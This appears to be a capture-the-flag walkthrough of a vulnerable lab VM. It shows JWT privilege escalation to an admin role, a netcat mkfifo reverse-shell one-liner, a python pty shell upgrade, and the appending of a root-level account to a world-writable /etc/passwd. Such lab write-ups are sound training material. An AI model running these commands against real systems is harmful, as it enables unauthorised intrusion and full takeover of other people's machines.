nmap -sV -sC -sT -p- 10.X.X.X


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

http://10.X.X.X/register


return l.prototype.registerUser = function (l) {
        var n = new x.Headers;
        return n.append('Content-Type', 'application/json'),
        this.http.post('/users/register', l, {
          headers: n
        }).map(function (l) {
          return l.json()


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


return l.prototype.registerUser = function (l) {
        var n = new x.Headers;
        return n.append('Content-Type', 'application/json'),
        this.http.post('/users/register', l, {
          headers: n
        }).map(function (l) {
          return l.json()
        })
      },
      l.prototype.authenticateUser = function (l) {
        return this.http.post('/users/authenticate', l).map(function (l) {
          return l.json()
        })



||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


l.prototype.onRegisterSubmit = function () {
        var l = this,
        n = {
          name: this.name,
          email: this.email,
          username: this.username,
          password: this.password
        };
        
        
        
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

register dos not work ->

curl -X POST 'http://10.X.X.X/register' -H 'Content-Type: application/json' -d '{"name": "newRoot", "username": "newRoot", "password": "root", "email": "newRoot@gmail.com"}'

go change users/register

curl -X POST 'http://10.X.X.X/users/register' -H 'Content-Type: application/json' -d '{"name": "newRoot", "username": "newRoot", "password": "root", "email": "newRoot@gmail.com"}'

gives me success
{"success":true,"msg":"User registered"}


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


{"success":true,"token":"JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiOiJuZXdSb290IiwiZW1haWwiOiJuZXdSb290QGdtYWlsLmNvbSIsInVzZXJuYW1lIjoibmV3Um9vdCIsImF1dGhfbGV2ZWwiOiJzdGFuZGFyZF91c2VyIn0sImlhdCI6MTY1Mjg2OTU1MCwiZXhwIjoxNjUzNDc0MzUwfQ.OUzRwurXJhs8ZrqCU0frfx8DRiFjThtHYaHpsEYzCMI","user":{"name":"newRoot","username":"newRoot","email":"newRoot@gmail.com","auth_level":"standard_user"}}


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


l.prototype.isAdmin = function () {
        var l = localStorage.getItem('user');
        return null !== l && 'master_admin_user' == JSON.parse(l).auth_level
      },


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

new token ->

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiOiJuZXdSb290IiwiZW1haWwiOiJuZXdSb290QGdtYWlsLmNvbSIsInVzZXJuYW1lIjoibmV3Um9vdCIsImF1dGhfbGV2ZWwiOiJtYXN0ZXJfYWRtaW5fdXNlciJ9LCJpYXQiOjE2NTI4NzA1NjksImV4cCI6MTY1MzQ3NTM2OX0.5JGycgEpmlUIj_IfE5TJiUPtCLJF-sUO_QobF176Wzg

{
  "payload": {
    "name": "newRoot",
    "email": "newRoot@gmail.com",
    "username": "newRoot",
    "auth_level": "master_admin_user"
  },
  "iat": 1652870569,
  "exp": 1653475369
}


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

http://10.X.X.X/dashboard

sqlmap still find nothing...


lets try code injection 

netcat -> 
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.X.X.X 4242 >/tmp/f
gives me success

open shell ->
python -c 'import pty; pty.spawn("/bin/bash")'   -> worked

cat etc/password



tmp$ git clone https://github.com/rebootuser/LinEnum.git

./LinEnum.sh

ı saw;
-rwxrwxrwx 1 root root 1653 Jul 15  2018 /etc/passwd

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

etc$ ls -la | grep passwd

-rwxrwxrwx  1 root root       1653 Jul 15  2018 passwd
-rw-r--r--  1 root root       1650 Jul 15  2018 passwd-

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

perl -le 'print crypt("newRootPassword", "aaa")'

aaVQWp6Pek3iU


create root user;
newRootPassword:aaVQWp6Pek3iU:0:0:newRootPassword:/root:/bin/bash

enroll the new root user;
echo "newRootPassword:aaVQWp6Pek3iU:0:0:newRootPassword:/root:/bin/bash" >> passwd

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

su newRootPassword
Password: newRootPassword

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

cd root
flag.txt

cat flag.txt

Congratulations on completing this VM :D That wasn't so bad was it?

Let me know what you thought on twitter, I'm @frichette_n

I'm already working on another more challenging VM. Follow me for updates.
